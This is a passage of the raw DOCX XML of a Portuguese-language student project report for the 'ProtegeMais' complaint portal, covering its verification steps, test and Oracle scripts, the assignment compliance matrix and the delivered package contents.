          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CommandLineRunner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, com a senha gravada em hash BCrypt. As senhas acima são de demonstração e existem para que a segregação de acesso possa ser conferida de verdade; a do ADMIN é sobreponível pela variável de ambiente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ADMIN_SENHA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="149"/>
    <w:bookmarkStart w:id="150" w:name="Xbb1e99f40591b1fae879cab3119d70846bbbaff"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B.5 Roteiro de verificação em oito passos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cada passo confirma uma afirmação específica deste documento.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">1. O CRUD funciona ponta a ponta.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Registrar uma denúncia pelo portal, anotar o protocolo devolvido, entrar no painel como GESTOR e localizar o caso no Kanban. Confirma a US31 e a seção 3.3.2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">2. A leitura do relato é auditada.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Abrir a ficha do caso pelo painel, depois entrar como AUDITOR e localizar o registro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CONSULTA_SENSIVEL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">com aquele identificador. Confirma a seção 5.4.1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">3. O mascaramento é do servidor.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Use um dos cinco casos de demonstração (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#2026-00451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#2026-00455</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), que são os únicos da base com endereço preenchido, justamente para que o mascaramento tenha o que esconder. Abra o mesmo caso como ATENDENTE. O endereço aparece como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[endereco protegido]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Abrir as ferramentas do desenvolvedor, aba de rede, e conferir que o JSON recebido também traz o valor mascarado, e não o endereço escondido por CSS. Confirma a seção 5.6, medida 2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">4. O RBAC é real.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Como ATENDENTE, clicar na aba de Trilha de Auditoria. A recusa aparece na tela. Como AUDITOR, abrir a mesma aba e localizar o registro daquela tentativa recusada. Confirma as seções 5.2.1 e 5.4.4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">5. Arquivo disfarçado é recusado.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Renomear um executável ou um arquivo de texto para</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e tentar anexá-lo pelo portal. A API responde 415. Confirma a seção 5.2.2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">6. A cadeia de auditoria é verificável.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Como AUDITOR, acionar a verificação de integridade. O sistema percorre a cadeia e informa se ela está íntegra. Confirma a seção 5.4.5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">7. As estruturas de dados estão na tela.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Abrir a fila de priorização e conferir que o topo é o caso de maior urgência. Mover um card no Kanban e usar o desfazer: o status volta, e a linha do tempo ganha um evento novo em vez de perder o anterior. Confirma as seções 4.1.2 e 4.1.3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">8. Os números do relatório batem com o documento.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Abrir a aba de Estatísticas e comparar média, mediana, desvio e coeficiente de variação com a tabela da seção 4.2.2. Devem ser idênticos, porque a base é determinística e o ponto de referência temporal é o último evento da base, não o relógio do computador.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="150"/>
    <w:bookmarkStart w:id="151" w:name="b.6-rodar-os-testes-automatizados"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B.6 Rodar os testes automatizados</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Na pasta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">backend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build.cmd clean test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No Linux ou macOS,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mvn clean test</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. O resultado esperado é</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">81 testes, zero falhas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. O Anexo D detalha o que cada conjunto cobre.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="151"/>
    <w:bookmarkStart w:id="152" w:name="b.7-o-banco-oracle"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B.7 O banco Oracle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Os três scripts de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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">são independentes da execução acima e servem para reproduzir o modelo físico em Oracle 19c:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">01_ddl_oracle.sql    cria as 12 tabelas, restrições, índices e comentários</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">02_dml_carga.sql     carrega as mesmas 125 denúncias e 201 eventos</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">03_consultas.sql     recalcula em SQL os números do relatório estatístico</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O terceiro é a forma mais direta de conferir a Parte 4 sem subir a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="152"/>
    <w:bookmarkEnd w:id="153"/>
    <w:bookmarkStart w:id="161" w:name="Xcba2bd3d0639b002d73da5ec7cd3d12b10029e5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Anexo C: Matriz de conformidade com o enunciado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Este anexo existe para tornar a conferência da entrega mecânica. A coluna</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Item exigido</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">reproduz o texto do enunciado da Fase 5; as demais indicam a seção que o atende, o artefato correspondente no projeto e a forma de verificar.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="154" w:name="c.1-parte-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C.1 Parte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87"/>
        <w:gridCol w:w="785"/>
        <w:gridCol w:w="2487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exigido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Relate quais foram as evoluções realizadas desde a última entrega de atividade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1.1, 1.2, 1.11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Quadros comparativos Fase 4 e Fase 5, e o registro cronológico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com a entrega anterior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Apresentar a versão atual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 a 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o repositório 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Executar conforme o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Tratar as ressalvas das avaliações anteriores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A e roteiro do vídeo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Tabela D1 a D5, com destino de cada uma</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="154"/>
    <w:bookmarkStart w:id="155" w:name="c.2-parte-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C.2 Parte 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95"/>
        <w:gridCol w:w="732"/>
        <w:gridCol w:w="2395"/>
        <w:gridCol w:w="23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exigido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Reavalie o Product Backlog criado nas fases anteriores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2.1, 2.2, 2.3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 US01 a US18 com estado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história aponta a rota ou o módulo que a implementa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Atualize-o com novas user stories relacionadas ao</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">front-end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US19, US20, US21, US22, US23, US32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Telas de fila, pilha, auditoria, estatística, ficha do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…relacionadas à</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">segurança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US24, US25, US26, US27, US33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AuditoriaService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MascaraUtil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RateLimitFilter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…relacionadas à</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">manipulação de arquivos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US28, US29, US30, US34, US35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EvidenciaService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AssinaturaArquivo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ExportacaoService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Escreva os critérios de aceitação das user stories prioritárias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conjuntos de critérios em Given/When/Then, cobrindo as 12 histórias Alta ou Crítica e a US17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critério é executável no roteiro do Anexo B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="155"/>
    <w:bookmarkStart w:id="156" w:name="c.3-parte-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C.3 Parte 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7"/>
        <w:gridCol w:w="638"/>
        <w:gridCol w:w="2427"/>
        <w:gridCol w:w="24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exigido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Implemente e documente uma API RESTful robusta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 rotas, 9 controladores, OpenAPI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Swagger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 prática:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">rotas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Inventário completo por área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/swagger-ui.html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 prática:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">métodos 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de PUT contra PATCH e de POST contra GET, ancorada no RFC 9110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Executar</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">PATCH /status</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">duas vezes e observar dois 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 prática:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">status 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14 situações, com a seção normativa de cada uma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Bateria do Anexo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 prática:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">tratamento de erros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GlobalExceptionHandler</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, corpo único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denúncia inválida e observar</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">detalhes</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">campo a campo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Boa prática:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">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JWT, RBAC, CORS, limite por origem, mapeados ao OWASP API Top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 3, 4 e 5 do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Garanta que as operações CRUD estejam funcionando para os principais recursos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Denúncia, Equipe, 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1 do Anexo B e Anexo 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Integre a API ao front-end desenvolvido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sincronia.js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detalhe.js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1 do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Demonstrando o consumo dos endpoints via interface</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">React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3.3.1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formulario-react.html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denúncia pelo React e observar 201, 400 e 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Documentação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OpenAPI 3 executável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/swagger-ui.html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/v3/api-docs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Consultar dados de forma eficiente (contextualização)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Filtros e paginação no banco, 13 índices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/api/denuncias?status=recebida&amp;pagina=0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="156"/>
    <w:bookmarkStart w:id="157" w:name="c.4-parte-4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C.4 Parte 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95"/>
        <w:gridCol w:w="732"/>
        <w:gridCol w:w="2395"/>
        <w:gridCol w:w="239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exigido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Estruturas de dados avançadas…</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">listas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@OrderColumn</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">na linha do 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por protocolo mostra os eventos em ordem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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">filas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PriorityQueue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FilaAtendimentoService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/api/fluxo/fila</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">e passo 7 do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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">pilhas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ArrayDeque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PilhaAcoesService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/api/fluxo/pilha</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">e o desfazer no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Presentes na lógica do sistema</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">ou na API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4.1, 3.1.2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Rotas</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/fluxo/fila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/atender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/pilha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/desfazer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Executar as quatro no Swagger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Gere e analise relatórios estatísticos (gráficos, tabelas ou dados relevantes)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EstatisticaService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RelatorioService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/api/stats/analitico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Apresentando gráficos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4.2.3 a 4.2.8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Seis gráficos em</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">estatistica.js</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">com Chart.js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de Estatísticas no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Cálculos e interpretações estatísticas aplicadas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4.2.1 a 4.2.9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Convenções justificadas por NIST, Oracle e literatura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Comparar com os textos gerados no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Sugestões para o negócio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Oito recomendações amarradas a números e a fontes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uma cita a medida que a sustenta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="157"/>
    <w:bookmarkStart w:id="158" w:name="c.5-parte-5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C.5 Parte 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31"/>
        <w:gridCol w:w="649"/>
        <w:gridCol w:w="2531"/>
        <w:gridCol w:w="220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exigido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Artefato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verificar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Como o sistema</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">controla o acesso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JwtAuthFilter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PerfilUsuario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4 do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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">protege dados sensíveis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medidas, de BCrypt a k-anonimato, cada uma com fonte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Passos 3 e 5 do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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">registra ações relevantes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5.2.3, 5.4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@Auditavel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AuditoriaAspect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AuditoriaService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2 do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Tabela indicando os</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">perfis de usuário e suas permissões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17 operações por 5 perfis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Trocar de perfil no painel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…e</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">quais funcionalidades acessam dados pessoais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Matriz de 9 dados por 5 perfis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 3 do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Defina quais operações precisam gerar</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">trilhas de auditoria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Catálogo de 11 ações em 15 endpoints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/api/auditoria/acoes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 quatro operações citadas: alteração de status, consulta sensível, exportação e exclusão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ALTERACAO_STATUS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CONSULTA_SENSIVEL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EXPORTACAO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EXCLUSAO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 de Auditoria, filtrando por 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que não é auditado, e por quê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 dos agregados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própria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Explique a</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">diferença entre logs técnicos e registros de auditoria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Quadro comparativo de 11 aspectos, ancorado no NIST SP 800-92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do erro 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Medidas adotadas para</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">reduzir riscos na exposição de dados por API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Oito medidas, mapeadas ao OWASP API Top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Seções 3.1.5, 3.3.3 e passo 3 do Anexo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Fundamento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Treze dispositivos, com o atendimento de cada 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própria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Limites declarados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Oito pontos em aberto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 própria</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="158"/>
    <w:bookmarkStart w:id="159" w:name="c.6-itens-de-entrega"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C.6 Itens de entrega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64"/>
        <w:gridCol w:w="792"/>
        <w:gridCol w:w="35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 exigido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Respostas de todas as partes documentadas em editor de texto, entregues em</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">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documento, gerado em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  <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">e convertido para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Apresentação de até</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">10 slides</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, entregue em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1 com nome completo, RM e foto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completo, RM e foto no primeiro slide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 no YouTube,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">não listado</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, até 5 minutos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na capa deste documento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 com pitch e navegação real pelo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Demonstração ao vivo do portal, painel, Swagger e trilha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do vídeo</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">no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 e ficha técnica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do vídeo</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">na apresentação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Slides 1 e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Link do vídeo</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">no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Rodapé de</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar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Coleção de arquivos de programação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Back-end, front-end e scripts de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 GitHub com o conteúdo do projeto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github.com/Gabriell230G/hackgovProtegeMais</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, link na capa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Wireframes e demais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de recursos do projeto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ZIP contendo documento em PDF, apresentação em PDF, arquivos de programação, wireframes e recursos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 na seção C.7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Todos os arquivos dentro de uma mesma pasta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Pasta única</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ProtegeMais_Fase5/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Funcionamento correto ao descompactar e abrir localmente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Anexo B, seções B.2 e B.3. O perfil</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">h2</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">dispensa instalação de banco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Vídeo</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">não</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">enviado à plataforma, apenas o link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Entregue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Publicado no YouTube como não listado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="159"/>
    <w:bookmarkStart w:id="160" w:name="c.7-conteúdo-do-pacote-entregue"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C.7 Conteúdo do pacote entregue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ProtegeMais_Fase5/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── index.html                  portal do cidadao e painel do orgao</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── formulario-react.html       interface React que consome a API</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── search.html                 pagina de disfarce do Modo Seguro</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── css/                        7 folhas de estilo</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── js/                         27 modulos JavaScript</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── images/                     imagens, icones e recursos</w:t>
